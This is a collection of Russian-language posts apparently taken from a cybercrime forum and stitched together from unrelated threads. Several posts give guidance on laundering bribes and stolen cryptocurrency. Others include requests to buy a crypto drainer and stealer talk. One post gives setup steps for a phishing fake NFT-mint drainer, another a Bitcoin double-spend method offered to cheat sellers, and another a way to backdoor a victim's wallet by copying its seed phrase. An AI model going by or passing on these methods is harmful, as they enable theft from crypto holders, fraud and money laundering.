Разумеется, это все с вами случиться не может, потому как у сервиса есть отзывы «авторитетов», депозит, знания и т.д. А те глупцы, которые борются с обналичкой и легализацией в нашей стране, просто не в состоянии ничего предпринять против идеальных схем, по которым работают сервисы по обналу «грязи». И переживать вам не за что. На этом этапе советую вспомнить свою молодость и барыгу на районе, который продает анашу и тот парадокс, что абсолютно все, даже бродячие собаки, знают о том, что это барыга, но его никто не сажает в тюрьму, никто не ловит, не утраивает облавы и т.д. , но по каким- то странным причинам , время от времени принимают людей, купивших у него траву. Вот так и в мире обнала, сервисов и «авторитетных» площадок. И так, подводя итоги, можно увидеть то, что вы добровольно предаете сами себя, а сервис, оказывающий вам услугу обнала «грязи» на самом деле просто меняет вам одну статью на другую и берет за это 30%. Причем получая деньги из миксера, может прилипнуть и 228, 222 статья. А по итогу вы ничего не легализовали, не отмыли и не спрятали. И все это при том, что я не стал описывать все риски при переводах, при которых можно потерять деньги. Но прошу обратить внимание, что у каждого сервиса по обналу, есть приписка: «За блокировку карты банком сервис ответственности не несет».

Теперь давайте поговорим о настоящей легализации и о том, какую же великую тайну все хранят и зарабатывают на этом. Наверняка многие прекрасно понимают, как и для чего это делается, но не имеют либо времени, либо ресурсов и поэтому обращаются к «понимающим людям». А некоторые просто прикармливают человека, который в кураже богатства, забывает об ответственности, а потом едет точить руки под кайло. Но ближе к делу. Наверняка у каждого есть такой знакомый, который работает в бюджетной организации, получает среднюю зарплату, а ездит на Гелике. Все это потому, что у него очень обеспеченная жена, которая очень успешный предприниматель. В качестве примера рассмотрим сотрудника ГАИ. Все сотрудники ГАИ нищеброды, чтобы вы знали. А вот их жены или другие близкие родственники, напротив, очень обеспеченные люди. Как правило у них есть какой- то бизнес: ларек, магазин, аптека или мойка и т.д. Для чего это нужно? Все правильно! Для внедрения грязи в легальный оборот. А происходит это так: Гаишник гасит водил на дороге и берет взятки, когда сумма взяток накапливается, приходит время их куда-то вкладывать. Но сделать он этого не может, потому что не может объяснить происхождение этих средств и получены они преступным путем. Поэтому его возлюбленная идет в ФНС и становится Индивидуальным предпринимателем. Затем открывает магазин, на деньги, взятые в кредит и начинает торговать продуктами, косметикой, порошками и т.д. Далее она постепенно добавляет к выручке те деньги, которые накопились от взяток и показывает как белые, платит налоги и вуаля!!! Теперь деньги полученные в виде взяток, можно инвестировать куда угодно. Например купить своему бедному мужу гаишнику Гелик, ну и раз год был такой удачный, то пожалуй и дом можно начать строить. А когда придет время подачи декларации о доходах, у всех есть железный аргумент! Я думаю, что сейчас абсолютно каждый понимает, почему в городе «Куриножоповск» с населением в 20 000 чел. есть бутик, в котором продают галстуки по 70 000 руб. Почему работают кафе и рестораны у которых бывает 4 посетителя в год и нет ни одного повара. Все верно, каждое 3 заведение работает по такому принципу. Что же касается остальных схем, то скажу одно: их огромное множество. Нет среди них идеальных, кто-бы и чтобы вам не говорили. Не нужно думать, что там где борются с обналом и легализацией доходов, сидят бараны!!! Это далеко не так! Давайте в качестве последнего примера в этой статье рассмотрим еще одну ситуацию: К примеру, есть у Вас 1 млн который нужно отмыть. Знакомых нет, ресурсов нет, а отмыть надо. Идете в сеть и находите очередной «гениальный» сервис с красивой рекламой и депозитом. В рекламе сказано: стаж работы в тени-14 поколений, депозит-5млрд$, проконсультируем, у нас работают специалисты высшего уровня, мы разработаем схему конкретно под ваш случай и т.д. Ну как можно не обратиться к таким профи? Вот тут важно понимать, что у многих притупляется чувство самосохранения и думать они начинают только о тех красивых рекламных лозунгах. И совершенно не думают о том, что это мог написать, прыщавый задрот, в потных очках, который пять минут назад мастурбировал на порно из ВК, а мог написать и товарищ майор, но на все это плевать, ведь у него депозит и отзывы. А если вы хотите легализовать свой доход, вам придется светить именно свои данные. Поэтому всегда 50 раз подумайте, а уж если решили пойти по этой скользкой тропинке, то начните пробовать с честными деньгами. А вообще вы с самого начала должны понимать и знать простые принципы этого механизма. Я постараюсь описать способ, который даст вам пищу для мозга!

ПРОШУ ОБРАТИТЬ ВНИМАНИЕ!!! Я ПИШУ ЭТО В ЦЕЛЯХ ОЗНАКОМЛЕНИЯ!

Грязные деньги проходят 3 процедуры: размещение, наслоение, интеграция. По крайней мере так говорит гугл. Размещение-это внедрение денег в оборот, т.е слив (банальная трата). Наслоение-это смешивание «грязи» с легальными деньгами в одном котле и совершение уже других сделок. Интеграция-это уже легальный кэш, который вкладывается в экономику.(покупка недвижимости, ценных бумаг и т.д)

В качестве примера приведу личный опыт. Я получаю серую ЗП и имею небольшой доход со стороны, официально не устроен. Как говорится: «волка ноги кормят». Для себя, я нашел решение в сети. Есть отличный ресурс, позволяющий производить все необходимые маневры, для преобразования «грязи» в чистый доход. И считаю так: «Если хочешь, чтобы все было сделано хорошо, сделай это сам!» И вам советую! Изучайте, анализируйте, ищите и будет Вам счастье! Вот вам и пища для мозгов.

На этой ноте я, пожалуй, буду заканчивать. И мне очень хочется пожелать Вам только успеха во всех делах и начинаниях. Я хочу поблагодарить вас за потраченное время и надеюсь, что вы смогли почерпнуть хоть какие-то новые для себя знания!
С уважением SNEG!

Нуждаюсь в очистке ценных кристалов манны от темной энергии.

Проштудировав всю доступную мне сеть,нашел только поросшие мхом и плесенью мануалы времён Империи.Не исключаю что со мной что то не так,и я проморгал нужную мне информацию,однако вопрос остается открытым.
В месяц сумма требующая занятного ритуала не так велика - 2к-3к$ .Я попытался поверхостно изучить материал самостоятельно,и на данный момент планирую поступить так :

Грязные битки - миксер - обменник - монеро1 - монеро2 - белый кошелёк - моя карта/карта дропа.

Или так

Грязные битки - миксер - локалбиткоинс - нал.

Знающие люди,поделитесь знаниями.

Вопрос в заголовке

Недавно начал возиться в криптой! папалось много кошелей с баликом,а вот что дальше и как правильно вывести или перевести хз
есть и сид фразы и приватные ключи
Кто подскажет как правильно к этому подойти

Как создать Fake USDT?
- Умелые люди, сообщите информацию.
Думаю эта статья поможет многим людям.

P.S : -- Я лично с людьми поспорил то что это возможно, и готов продемонстрировать.

много писали по этому поводу.
Могу объяснить принцип их создания, как их делать, как использовать дыры в смарт контрактах.
Так же могу научить создавать токены с нуля.
Компилировать контракты, добавлять ликвидность и создавать проекты под ключ.

Пишите в ПМ. Гарант +

Друзья, всех приветствую, произошла вообщем не очень приятная ситуация, наткнулся на монету в приват-канале под названием KIZ, ну и решил попробовать купить ее, ранее в таких проектах не участвовал, купил монет я значит на хаях и вижу что растет, ох как растет активно, после чего решил добить свой кошелек, по скольку лежали еще какие-то свободные финансы на подобные риски, но я не обратил внимание, что вывод невозможен и просто пулял туда деньги по приколу, так вот прикол не удался, как итог - неплохая сумма денег, я бы даже сказал охуеть какая не плохая. На ликвиде у них сейчас лежит 150.000$ и они не выводят их, но когда я пытаюсь конвертировать у меня не получается, отправка так же невозможна.

Что возможно с этим сделать?

(забыть, забить, ничего) к ответу не принимаются.

0x3ED8a69059D05DA6A830a24364603bee379F8dd2 - контракт​

​

Может кому повезет https://mega.nz/folder/Qs5CHIQC#-M98l9rov3XwlV9zvflIfQ

Bitcoin не анонимен, т.к. не чистит логи, доступен в клирнете, использует блокчейн, вываливает в паблик цепь транзакций за всю историю, собирает статистические данные, ограничивает количество выпускаемых монет.

Есть ли спрос на разработку TOR валюты, более анонимной чем монеро? С простым майнингом, страхованием рисков, без блокчейна.

Курс монеты обеспечивается валидными банковскими картами и взломанными криптовалютными кошельками.

Ограничения: монета не может использоватся для педофилии, ЦП, неонацизма или фашизма.

Как ни крути, биржами все равно приходится пользоваться, а биржа - это узкое место, бывают и локи, и требования верификации и даже скам-экзиты

выбираем лучшую биржу для среднестатистического блекхета нашей сферы

критерии (все относительные): анонимность, отсутствие локов, не надоедливость верификации/kyc/aml, трастовость, скорость ввода-вывода крипты, умение работать с разнымит суммами

ваши мнения?

Прочитал сообщения по прогнозам и решил отдельную тему запилить.
Биткоин упадет в район 12-14К, это 80% от пика как и в предыдущие разы на это же указывает дивергенция по тоталу биткоина, район обьемов от 130-150 лярдов раньше покупать не советую.
Упали в июне как раз перед заседанием фрс. Следующее в 27.07.22 если к этому времени не упадем до тех объемов что указал то упадет еще раз в июле. И таких заседаний на этот год запланировано еще 4. И каждый раз фрс будет поднимать ставки, официальная инфляция в сша в районе 7% значит до этого уровня будут поднимать ставки. Но промышленная инфляция 20-25%, конец Бреттон-вудской системе.
Думаю что многие уже поняли что доллару пришел конец, как и всей мировой экономике, в ООН предупредили о дефолте в 70 странах а это четверт мира и это только в этом году. В течении пары лет евросоюз развалится совсем и индекс доллара рухнет когда это происходит биткоин летит вверх, сейчас когда все катится в дно индекс DXY летит вверх, значит доллар схлопнится последним. Возможно биткоин полетит на луну к концу года, в ноябре в сша промежуточные выборы и к тому времени снимут Байдена, как стало уже всем понятно победят на выборах республиканцы, скорей всего Трампу не достанется место президента, думаю Иллон Маск не зря топил за республиканцев и его попытка покупки Твиттера указывает на то что скорей всего следующим президентом сша будет Иллон Маск. Если все таки победит Трамп то сша развалится на штаты.
Что касается доллара к рублю то мы еще увидим 74 за доллар, но после это я не стал бы держать его как актив для сохранности. Я свои продал еще на 120, доллар вскоре упадет к рублю очень сильно, мир будет делится на валютные и экономические зоны, пока что их будет 4, это Индия, Россия, США и Китай. Геп в районе 2,30 за доллар это настоящая цена, вообще лучше держать в рублях и крипте, те немногие у кого что то осталось побегут в крипту когда начнется глобальный ппц, как это сделали наши звезды когда побежали за границу. В поддержку рубля скажу что ВВП еще в 2016 году сказал подготовить 3 варинта экономики в РФ, с 2020 года он всем лидерам евросоюза говорил Бреттон-вудской системе пришел конец. Прошлый кризис 1930 года длился 3 года, нынешний продлится 5-6 лет. И на последок если Иллон Маск до конца октября закроет сделку по Твиттер то я бы прикупил Dogecoin, его любимую собачку.

Предлагаю обсудить немаловажный вопрос - а именно легализацию и налогообложение крипты
вот заработали вы крипту, прогнали через миксер, сидите с уловными отбеленными 10 бтц на руках
но дальше же их нужно легализировать как-то, оплатить с них налоги и вывести
желательно, чтобы все это стоило адекватных денег в итоге
выводить серыми нет резона, толку с серого нала, если его потом потратить - еще та проблема
Ваши мысли? идеи?

ЗЫ не рассматриваем варианты лагелизации обычного нала, фиктивного трудоустройства и пр. речь именно о крипте, как из крипты выйти по-белому в чистый, белый и налогообложенный нал

Скрипт криптовалютной биржи, который продавался за 3000 долларов

Возможности:
SPA Structure
Trading API
Multi Language
Theme Editor
Limit Orders
ETH & BTC Nodes
List own ERC-20 Token
Unlimited Markets
Socket System
+1000 COINS

В архив положил видеомануалы по настройке от автора скрипта.
Конфигурации и требования к серверу так же лежат в папке.

Демо: https://demo.exbita.com/
Скачать:

You must have at least 100 message(s) to view the content.

Hello everyone,

I'm looking for a crypto drainer to buy that obviously works perfectly!
A multichain drainer (eth, soil) etc...

Do you have any to suggest?

Здравствуйте. Нужно обменять биткоин на монеро. Как это лучше всего сделать? Главное требование, конечно же, анонимность. Так же желательно маленькие комиссии.
Слышал о DEX, т.е. децентрализованный обмен, но ни разу им не пользовался до этого и знаю о нем очень мало. Если DEX это хороший вариант, то какой обменник посоветуете?
Спасибо!

Вводные данные: есть акк на binance с балансом, пройден вериф, подцеплена почта, телефон, G authenticator. К этому всему есть доступ!
Проблема: При выводе просит пройти лицевую проверку, а лица нет. Есть только фотка и та не очень.
внутренний перевод, боксы и тд, ничего не дает без лица вывести.

Буду финансово благодарен тому кто поможет.

Привет всем, посоветуйте заработок на крипте +- с 0
на данный момент пытаюсь как-то заработать на стилере но ведутся оч мало людей
так же буду рад если возьмёте куда-то к себе

заранее спасибо.

Если ошибся разделом, то извините. Видел темы, что отрабатывают coinbase,binance, снятием 2FA, как это делают?

Всем здравствуйте, есть ли умельцы затер флешку случайно все абсолютно. там все- 12 слов. пас от почты пас от блокчейна. Реально как-то деньги вытащить? Там щас 16к личных. на мою подругу оформлен акк, подруга рядом. Человек взрослый не молодой.

Ищу любые варианта восстановления акка. все утерянно, абсолютно все. Но на кого регали акк под рукой она. все снимет видео, фото и т.д. ЧТО ДЕЛАТЬ МНЕ. жЕСТЬ 16К ВЫКИНУТЬ ПРОСТО ТАК........

Почту родную уже восстановил. куки в браузере с начала оснавания кошелька.

fixedfloat локнул обмен, с таким сообщением "Ваш заказ был остановлен, поскольку мы получили информацию от наших партнеров, что средства на вашем адресе получены преступным путем. Ваш обмен сейчас обрабатывается нашей службой безопасности.", у кого было такое и решалось ли?

просят пруфы что монеты получены честным путём, что лучше подойдёт , у кого были такие же ситуации?

более 250+ сделок с ними было такого же обмена
как сумма перешла черту чуть, АМЛ проверка на грязь упала
я думаю это специально сделали, какие шансы вообще в возврате или же как доказать? (буду сам делать, так как услуги чьи-то не нужны, везде рисуют , то что и сам я могу заказать ), важно понять в каком направление думать и рисовать подтв. того, что средства легальные были?

Я конечно понимаю, что мало кто будет делиться чем-то, но вдруг.....
пишите в tg @hunter_shelby

Знаю, было кучу тем, но всё же.

Требуется разово залить крипту на биржу, обменять, и сразу вывести. Чуть меньше 1 BTC.

Подскажите биржу, которая не потребует KYC, и что бы не пришлось ждать 24 часа для вывода, из-за нового аккаунта.

Нужен именно CEX, а не DEX и не обменник.

Внимание! Использовать в целях обучения! В код вшит кошелек 0x2ed40808C75379AD6114807cbb044cB619c0D214 и адрес api.rarecity.art (Moralis API)
web3.min.js
api.rarecity.art:2053
// Администрация форума

Суть фейка заточена под фейковый NFT mint, если у пользователя есть NFT, то в первую очередь его попросят отправить их под видом обычной транзакции и оплатой за GAS, но если NFT отсутствует , то будет создана транзакция на отправку эфира, учитывая что он есть в кошельке пользователя, если он отсутствует, ему будет выдана ошибка, чтобы он не узнал и не узнал все прелести функциональность!

Cкачать bind можно по ссылке

Настройка:
На временную почту зарегистрируйтесь moralis.io, нажми create new dapp, сеть mainnet ethereum, регион любой.
Жмем на создавшемся сервере settings коируем serverUrl и вставляем в 93 строку , так же копируем appId и вставляем в 94 строку
96 строка указываем свой кош eth
97 строка минимальный прайс минта , желательно от 0.1 эфира
Так же вы можете поменять дизайн на свой , заменив 2 картинки в папке assets.
Покупаем хостинг, домен и льем траф

Пример моего бинда

Spoiler: Пример моего бинда

Советую делать красивые ленды , или маркетплейсы и уже по кнопке ставить наш бинд.
Я же не парился , т.к у меня был хороший трафик с твитера и просто выкладывал обычный бинд.

Сколько получалось вытащить с хорошего трафа ?
Ниже пример одного хорошего твиттер акка!
Земли в децентраленде продал за 40к$
Еще одну nft за 10eth
Остальное продал в общем на 25-30к
Ну и сумма в транзах вытянула на 17к$
Остальные залеты не вижу смысла выкладывать)

Spoiler: Профит с твиттер

Всем профита !)

ПРЕДИСЛОВИЕ

**ЭТО КОПИПАСТА, О ЧЁМ НАПИСАЛ СРАЗУ В НАЗВАНИИ. На XSS не видел - решил запостить.
Если это как-то нарушает правила форума, сообщите мне - всё решим, всё исправим. С правилами ознакомлен, но, вы, наверное, шарите лучше меня. В этой статье будет сначала общая теория, а потом глубокая конкретика (в виде архива с большим курсом по арбитражу 2022 на 5.5гб)

*А ещё оцените мою авторскую статью на конкурс - /threads/66377/ ***

В этой статье мы расскажем про арбитраж между криптовалютами: что это такое, какие биржи можно использовать, какие сервисы и боты для этого есть и реально ли заработать на арбитраже?
Главное правило в основе арбитража: купи дешевле, продай дороже. В общем, если вам удается покупать по низкому курсу на одной площадке, моментально переводить монеты на другую, и там продавать дороже, чтобы покрыть комиссии и заработать, вы делаете межбиржевой арбитраж криптовалют.
Поскольку криптовалютный трейдинг только зарождается, но рынки существуют по всему миру, между биржами могут быть существенные различия в цене. Трейдер пользуется этой разницей курсов.
Звучит просто, но в этой схеме есть несколько серьезных рисков, о которых нужно знать, чтобы обеспечить себе заработок на арбитраже криптовалюты.​

​

Что такое арбитраж криптовалют?​

Это покупка и мгновенная продажа криптовалюты на разных рынках с целью получить прибыль от разницы в курсах (спрэде) между ними.
Самая простая схема арбитража между биржами криптовалют:​

• Найти монету или токен, который имеет курс ниже на бирже А, чем на бирже Б.​

• Купить токен на бирже А.​

• Продать на бирже Б.​

• Разницу цен забрать себе.​

Важная скорость, поэтому используются сканеры криптовалют, боты для переводов и другие программы, автоматизирующие процесс.
Арбитраж появился давно, он существует и на фондовых и валютных рынках. Но на традиционных биржах торговать по этой схеме сложнее, потому что цены держатся примерно на одном уровне. Но в мире криптовалют, где еще есть потенциал для роста, а объем торгов может наращиваться в отдельных регионах, такая возможность остается. Эту возможность оставляют и биржи, которые неэффективно сотрудничают между собой, что приводит к высокому спрэду.
Известные биржи, которые собирают ликвидность (у которых много пользователей и постоянные торги) управляют ценой остальной части рынка, а более мелкие биржи подчиняются общему тренду. Тем не менее на локальных биржах происходит задержка изменения курса, и это открывает возможность арбитража на биржах криптовалют.​

Как работает арбитраж?​

Арбитраж становится возможным из-за разницы в объемах торгов между двумя отдельными рынками. Причина проста: на рынке с большими объемами, где есть достаточно предложений по монете, цены, скорее всего, дешевле. Но на рынке, где предложение данной монеты ограничено, она будет дефицитнее, а значит, курс выше.
Иногда это работает в противоположном направлении: можно брать монеты на маленькой бирже и продавать на большой. Обычно, токен дешевле торгуется на 2p2-обменниках и тех площадках, где нет верификации.
Всплеск популярности криптовалюты в начале 2018 года привел к резкому увеличению. По всему миру начались активные торги, и на биржи попало много денег. Но биржи не входят в единый альянс, не используют общую политику, в общем никак не договариваются. Низкий объем на некоторых биржах приводит к тому, что курс не сразу адаптируется к средней цене по всему миру.
Самый известный прецедент различий в ценах криптовалюты — Kimchi Premium. В январе 2018 года курс биткоина в Южной Корее был на 50% выше по сравнению с мировыми ценами.
Есть несколько видов арбитража по степени автоматизации:​

• ручной арбитраж, когда трейдер сам контролирует различия в ценах, создает ордера и переводит средства между площадками;​

• мониторинг через бота — специально настроенный бот анализирует цены на площадках и сообщает пользователю о выгодных парах,​

• автоматический арбитраж — биржевой бот или сервис проводят сделки в автоматическом режиме. Скрип настроен так, чтобы отслеживать цены, размещать ордер, переводить монеты на адрес на другой бирже и там продавать их. Бота можно написать самостоятельно или купить. Есть open source проекты, которые можно скачать бесплатно и настроить под себя. Например, можно нагуглить бота для внутрибиржевого арбитража на LocalBitcoins. Но будьте внимательно! Такие проекты могут оказаться скамом, чтобы забрать адрес вашего кошелька.​

Есть несколько видов арбитража по выбранной стратегии:​

• базис, простой — торговля на разнице цен на отдельных площадках, например, купить на LocalBitcoins и продать на OKEx. Учитывайте комиссии!​

• внутрибиржевой, треугольный — имеем 1000 USD, покупаем, например, ETH, обмениваем на XRP, продаем за USD. Если цены соотносятся правильно, то вы получите больше USD, чем вводили.​

• статический арбитраж — два депозита на разных площадках. Нужно отслеживать колебание спрэда. Когда на бирже А спрэд выше исторического соотношения, нужно продать монеты и одновременно купить их на другой бирже.​

Подробнее про виды арбитража на классическом рынке можно узнать из видео:
​

Простой пример​

Шаг 1: Бот сигнализирует о разнице в цене: XRP/USDT на бирже А стоит $0,355470; на бирже Б — $0,377364.
Шаг 2: Проверяю ликвидность бирж.
Шаг 3: На бирже А покупаю XRP на 1000 долларов. Комиссия 0.2%. Получаю 2807 XRP.
Шаг 4: Перевожу XRP на биржу Б, вывод XRP бесплатен.
Шаг 5: Получаю XRP на аккаунте бирж Б.
Шаг 6: Продаю 2807 XRP по курсу $0,377364. Получаю 1059,26 долларов.
На арбитраже криптовалюты гипотетически удалось заработать почти $60.
Среди преимуществ арбитража называют:​

• быструю прибыль, которая собирается практически в автоматическом режиме, если вкладываться в правильные сервисы или написать программу самому,​

• большой выбор — множество монет и торговых площадок, в соотношении которых можно найти разницу в ценах для получения прибыли с арбитража,​

• меньшая конкуренция, так как сфера только зарождается,​

• высокая волатильность дает больше возможностей заработать на разнице в ценах.​

Сканер для арбитража​

Есть множество программ разной стоимости и функциональности. Мы собрали некоторые по отзывам:​

• AlgoTradingCenter — «Межбиржевой арбитраж криптовалют» за 345 долларов. Только анализ бирж и пар, без возможности покупки через программу.​

• бесплатный проект, который работает на донатах, — http://trd.ai/,​

• DeepForks — бот с аналитикой,​

О чем важно помнить​

То, что зарабатывать на арбитраже криптовалют можно, не оспоримо. Но этот путь может показаться излишне простым. Нельзя забывать о высоких рисках любых предприятий с деньгами, особенно на криптовалютных рынках.
Вот несколько советов для новичков:​

• Начинайте арбитраж только если действительно понимаете, что это. Лучше иметь достаточно технических знаний.​

• Выбирайте правильные биржи, чтобы не нарваться на скам. Смотрите, какие комиссии, как работает техподдержка, сколько предложений (не поддельная ли ликвидность) и прочее. Со временем составите свой список из нескольких площадок.​

• Регистрируйтесь на площадках заранее. Смотрите, чтобы площадка работала с резидентами РФ (или вашей страны) или используйте анонимное ПО.​

• Учитывайте, что есть задержки при переводе денег. Например, биткоин или эфир часто загружены, а комиссия майнеру окажется высокая, это собьет всю стратегию, и вы можете остаться в минусе.​

• Проводите расчет всех комиссионных сборов. Иногда арбитраж не окупит себя!​

• Торгуйте с небольших сумм.​

• Не ведитесь на бесплатные программы и дешевые сервисы. Это может быть опасно. Ищите программы для арбитража по отзывам, лучше в англнете. Профессиональные боты стоят дорого.​

АРХИВ НА ПОЛНЫЙ КУРС 2022 (5.5ГБ) - cloud.mail.ru/public/8Wk9/3m2WarDkL​

Криптовалютный проект Blockatom wallet, это Десктопное приложение для управления своими Bitcoin а так же клиент Telegram bot.

Вся суть проекта в том что это самый обычный кошелёк для получения и отправки монет, но все средства пользователей этого кошелька храняться на вашем дочернем кошельке, через который они производят получение,генерацию адресов и отправки монет, это некий централизированый кошелёк только со стороны средств, что бы сделать адреса пользователей дочерними к вашему кошельку, достаточно в код прописать вашу seed фразу через которую програма пройдёт иерархию для создания уникального адреса, Wallet Import Format , public key, для осуществления транзакций.

Весь проект написан на Python 3.8.5 + QT

Проект продавался:

Spoiler: Объявление о продаже

В продажу входит:
1. сайт (исходный код) -

https://imgur.com/muDqQrH

2. Десктоп приложение (исходный код) -

https://imgur.com/WfmJOHC

3. Telegram бот (исходный код)

При покупке возможно дописать и внести ваши дополнения! А так же консультация

• поддержка и помощь в установке всего.

Цена - $3000

Если требуется поддтверждение писать на @Blockatom_support (Telegram)
По остальным вопросам - консультации, покупки, тех вопросов писать на sensords (Telegram)

Теперь выложен бесплатно:

[ GitHub - sensords/XssBitcoinWallet

](https://github.com/sensords/XssBitcoinWallet.git)

Contribute to sensords/XssBitcoinWallet development by creating an account on GitHub.

github.com

Бешенный скачек пошёл. Успел кто то заработать ? Я в апреле по фану взял на 10$ , вышло 50 млн shib, в середине мая продал , вышло 1к $, а сейчас смотрю и понимаю , то что рано продал

Незнаю в какую ветку запостить, P.S админ перенеси если что туда куда нужно = )

Эта статья(новость) создана исключительно для сбережения ваших средств.

Хочу затронуть рынок криптовалют а особенно проекты DeFi, так называемые монетки которые создаются на базе блокчейна определённой криптовалюты ака ETH,BNB,MATIC,COSMOS,POLYGON и т.д, не имея никакой технологии за собой в целом.

Сейчас идёт очень большой хайп среди DeFi проектов, где можно купить немного монет и получать % дивиденды с фарминга, так называемые огороды. Так же огороды (DefI) предлагают создать связки монет по типу usdt/busd , btc/(монетапроекта) и вложить их в свой смарт контракт. Вы наверное видели новости о том что большинство DeFi проектов были взломаны под средством Flash Loan attack (Мгновенные кредиты) под видом которых потом из за плохого рассчета контракта, кибермошенник может вывести все средства(Ликвидность) из пула. Так же существуют другие типы атак, скама и т.д.

High risk контракты, самые опасные котракты в DeFi, определить их не так просто без знания Solidity, данный тип контрактов может удержать все ваши средства внутри контракта и разработчик контракта сможет похитить все ваши средсвта в 1 клик, так же есть контракты которые могут похитить все ваши средства с кошелька как только вы его одобрите.

DeFi в ковычках это "Дец фин сервисы" которые якобы борятся за свободу и т.д, но на самом деле это не так, все DeFi построенные по принципу пирамиды как и криптовалюты в целом, сейчас по статистике CMC на рынке около 11 751 криптовалют не считая Total ShitCoins. Кто то делает блокчейны, а кто то просто создает экосистему на этих блокчейнах клепая безсмысленные монеты обещая вам х10000 роста и т.д.

NFT - очередное говно для лохов, с приходом DeFi появились и NFT, которые щас клепают как горячие пирожки, люди выкупают всё это дерьмо в надежде того что это будет стоить миллиарды в будущем, но поверьте никому не нужен ваш (ГовноКод и картинка в интернете) так же из 100% NFT, останется 1-2% годных NFT а остальные 98% можно будет выбросить в мусорку которые вы купите за 100-1000 и выше$.

В целом по состоянию рынка, на сегодняшний день хайп вокруг крипто индустрии начинает нагреватся еще сильнее с принятием криптовалют на официальном уровне. Каждый 2 мечтает что вот сейчас он купит каждой монеты по немногу и через пару лет станет миллионером, (Возможно станете, если зайдете или зайдете вовремя).

Криптовалюты работают по принципу пирамид как я говорил ранее, кто то купил дешевле, кто то дороже, в итоге тот кто купил дешевле - продает дороже, а тот кто купил дороже - остается у разбитого корыта и начинает продавать еще дешевле.

Механизм Burn - вот это прям для лохов максимально было создано, внушить людям что сжигая монеты они будут становится дороже, посмотрите на проект DeFi (polycat) эмиссия монет 3.000.000, разработчики уверяли людей что они смогут получать дивиденды как только эмиссия приблизится к концу, по итогу умные люди начали выводить свои средства, и токен обвалился с 68$ до 1.8$ - на минуточку это топ 1 проект на блокчейне polygon(matic). Так будет с каждым проектом DeFi в любой эко системе блокчейна, потому что это одним словом это пирамида.

Взломы DeFi - вот это моё любимое, нашумевшие взломы, каждый раз заголовки что у кого то там похитили сотни миллионов долларов. В основном дыры создают заранее разработчики, дабы сбежать с вашими деньгами, изначально завлечь по больше лохов, поставить хороший % на добычу блока, а затем просто написать что нас взломали, 99% закрывались сразу же после взлома и исчезали, так же анализируя DeFi эко систему, я видел что один и тот же человек создавал очень много схожих DeFi проектов на своём аккуанте github, вёл их пару недель а затем тупо закрывал под видом взлома. Как говорится хочешь много денег? Открой свой DeFi и продавай толпе свои говно-монеты.

Slow Rug - больная тема всех крипто инвесторов в DeFi, каждый мечтает сидеть вложив деньги получать % и ничего не делать, разработчики заранее разрабатывают контракты так, что бы часть добычи с блоков падала к ним на кошелек, они божатся своими семьями, дедами, бабками и т.д что никогда не продадут свои монеты и т.д, но в оконцовке мы видим одно, как только ликвидность проекта собирает хорошие деньги, разработчики резко перемещают токены со своих адресов и начинают их продавать обрушая цену токена до 0, ведь они продают воздух и ничего не теряют а на проект им вообще похер, ведь на кону миллионы долларов и даже сотни миллионов = )

ICO SCAM - в простонароде ай си О, куплю по дешевле и через пол года сделаю иксы, куплю дом яхту и т.д. Вот это единственное место где можно подорвать неплохие деньги, но опять же задался тренд, выпускать обложку(сайт), путь он же roadmap, собрать деньги с бобров, наобещать супер мега технологии и в оконцовке забить хер, сбежав со средствами вкладчиков. Ведь ты анонимный и никто тебя никогда не найдет.

Вывод один, инвестируйте в блокчейны с умом а лучше их создавайте, а не во всякий шлак по типу дефи нфт и т.д, изучайте проект DYOR(Do your own research

• Любимая цитатка DeFi скамеров), на сегодняшний день на рынке уже есть годные блокчейны по типу Solana, Ada, зачем вовсе создавать другие, без понятия, для меня этот мир вообще не понятен, сколько народ будет хавать еще это дерьмо.

Что лучше с точки зрения неотслеживаемости?

Народ у кого работает blockchain? вернее кто может зайти на web или мобильную версию?

69 000 (шестьдесят девять тысяч) биткойнов сдвинулись с предположительно взломанного кошелька


Transaction: 3f036ff88bb851b57a1e28780dbce35a6457a8b57995c095b55b3b0cf48ba9fd | Blockchain.com

The easiest and most trusted transaction search engine and block explorer.

www.blockchain.com

памянем курс биткойна

Кто объяснит, а что вообще происходит? Транзы висят мертво, мемпул забит наглухо, комиссии безумные

Pool transactions 151 729
Best fee 295.15 ś/vByte
Hashrate 103.38 EH/s

Click to expand...

вообще никогда не помню, чтобы в пуле висело почти 152 тысячи неподтвержденных транз. вроде и хешрейт нормальный
из-за чего все это?

Способ отмены транзакции Bitcoin

Отмена работает в течении 10 мин, не более.
Почему это удобно использовать?

1. Есть некоторые сайты по приёму биткоинов, которые зачисляют мгновенно без подтверждение транзакции, сами ищите их. (можно отменить)
2. Если транзакция зависла или вы случайно отправили не ту сумму. (можно отменить)
3. Если хотите обманом купить что то у кого то. (можно отменить)

И так начнём

Перед тем, как совершать финансовые операции нам нужно экспортировать ключ(wallet.dat)

1. В кошельке перейдите в отладочную консоль (Помощь — Окно отладки — Консоль) (Help – Debug window – Console)

2. В консоли пишем dumpwallet bhf (где bhf любое имя) и нажимаем Enter.
   В результате появится файл со списком всех приватных ключей и адресов
   *\Bitcoin\bhf

3. Теперь отправляем N - кол-во BTC на адрес ...

4. Убедитесь, что транзакция неподтвержденная
   

5. Выходим с кошелька
   

6. Идём в папку и удаляем файл wallet.dat (на всякий случай сохраните в другое место, это ваш кошелек с текущим балансом)
   

7. Снова заходим в Bitcoin Core открываем консоль и пишем importwallet bhf (где bhf ваше имя файла) и нажимаем Enter.
   Начнется импорт всех приватных ключей и адресов, а далее пойдет рескан цепочки.
   Это может занять достаточно много времени, но в любом случае дайте ему завершиться, примерно 2-3 мин до завершения.

8. На балансе будут ваши биткоины + в нижнем углу придет входящая транзакция, которую вы отправили ранее.

Если сделать это в течении 10 мин пока нету 1 подтверждения транзакции, ваши средства возвращаются.

[https://github.com/petertodd/replace-by-fee- tools](https://href.li/?https://href.li/?https://github.com/petertodd/replace- by-fee-tools)

Бэкдор кошелька blockchain.com

Бывало ли у вас, что зайдя на blockchain вы видите хорошие транзакции, но на балансе либо ноль, либо какая-то маленькая сумма? У меня - да. В этой ситуации оптимальным (на мой взгляд) решением будет бекдор кошелька.

В чем суть?

Во вкладке Security center мы делаем бекап фразу кошелька и сохраняем себе. Все. Вы превосходны

Если у юзера она уже есть - тем лучше, он не обратит внимания на новую галочку в настройках.

Также мы можем чекать баланс кошелька по биткоин адресу и xpub на blockchain.
Последний можно получить в Settings > Wallets and Addresses > Manage > Show xpub

[ Работа с Electrum, Отмена транзакции Bitcoin!.mp4 -- Радикал-Видео

](https://radikal.ru/video/P7JKNBEC7f6)

Радикал-Фото - сервис публикации изображений для форумов и блогов: Видео

radikal.ru

